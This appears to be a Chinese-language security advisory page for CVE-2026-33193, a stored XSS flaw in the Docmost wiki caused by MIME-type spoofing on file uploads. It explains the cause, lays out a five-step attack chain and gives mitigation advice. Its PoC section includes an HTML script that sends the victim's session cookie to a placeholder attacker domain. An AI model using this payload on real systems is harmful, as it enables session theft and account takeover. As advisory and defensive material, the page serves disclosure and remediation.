CVE-2026-33193 CVSS 4.6 中危

CVE-2026-33193 Docmost 存储型XSS漏洞

披露日期: 2026-04-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33193

漏洞类型

存储型XSS

CVSS评分

4.6 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Docmost

漏洞概述

Docmost 是开源协作 wiki 软件，0.70.0 之前版本存在存储型 XSS 漏洞。该漏洞由 MIME 类型欺骗处理不当引起，攻击者可注入恶意脚本危害用户安全。目前官方已在 0.70.0 版本中修复此问题。

技术细节

该漏洞的根本原因在于 Docmost 在处理用户上传的文件内容时，缺乏对 MIME 类型的严格校验机制。攻击者可以利用这一缺陷，上传包含恶意 JavaScript 代码的 HTML 文件，并通过修改 HTTP 请求头中的 Content-Type 字段（例如设置为 image/jpeg）来欺骗服务器。由于服务器仅依赖扩展名或请求头进行判断，而未对文件内容的魔数进行深度检测，这些恶意文件被作为合法资源存储。当其他用户访问包含该附件的文档页面时，浏览器可能会根据上下文或错误的 MIME 类型解析文件，导致脚本执行。攻击者可借此窃取 Session Cookie、执行管理员操作或进行钓鱼攻击。由于是存储型漏洞，攻击代码长期驻留服务器，危害性较大。

攻击链分析

STEP 1

1. 构造恶意载荷

攻击者创建包含恶意 JavaScript 代码的 HTML 文件，该代码用于窃取 Cookie 或执行其他恶意操作。

STEP 2

2. MIME 类型欺骗上传

攻击者将恶意文件上传到 Docmost，并在上传请求中将 Content-Type 修改为合法的图片类型（如 image/jpeg），绕过简单的服务器检查。

STEP 3

3. 恶意代码存储

由于服务器未正确验证文件内容，将伪装的 HTML 文件作为普通文件存储在服务器上。

STEP 4

4. 诱导访问与触发

当具有权限的受害者（如管理员）浏览包含该恶意文件的文档时，浏览器解析文件内容并执行其中嵌入的脚本。

STEP 5

5. 攻击后果

恶意脚本运行，窃取受害者的会话凭证或执行未授权操作，导致账户被接管。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Proof of Concept: MIME Spoofing XSS -->
<!-- 1. Create a file named exploit.html -->
<!-- 2. Send it to the server with Content-Type: image/jpeg -->
<!-- 3. Trigger the view on the target page -->

<html>
<body>
<script>
  // Simple payload to verify execution
  alert('CVE-2026-33193 XSS Triggered');
  
  // Exfiltrate document cookie
  var img = new Image();
  img.src = "http://attacker-controlled-domain.com/collect?c=" + encodeURIComponent(document.cookie);
</script>
</body>
</html>

影响范围

Docmost < 0.70.0

防御指南

临时缓解措施

若无法立即升级，建议暂时禁用文件上传功能或仅允许受信任的用户上传文件，并对所有已上传的文件进行人工审核。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表